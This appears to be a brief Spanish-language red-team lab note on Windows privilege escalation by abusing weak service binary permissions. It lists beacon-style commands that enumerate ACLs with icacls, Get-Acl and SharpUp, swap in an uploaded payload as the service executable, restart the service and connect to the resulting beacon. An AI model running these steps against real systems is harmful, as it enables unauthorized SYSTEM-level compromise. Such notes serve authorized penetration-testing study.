Weak Service Binary Permissions
Identificar servicios vulnerables.
run icacls "C:\Program Files\Vulnerable Service3\Service3.exe"
powershell Get-Acl -Path "C:\Program Files\Vulnerable Service3" | fl
execute-assembly C:\Tools\SharpUp.exe audit ModifiableServicesBinaries
Verificar las caracteristicas del servicio.
run sc qc "Vulnerable Service 3"
Creamos un payload y lo subimos a la maquina victima.
upload C:\Tools\Payloads\Service3.exe
Iniciar servicio.
run sc stop "Vulnerable Service 3"
run sc start "Vulnerable Service 3"
Acceder al beacon.
connect localhost 4444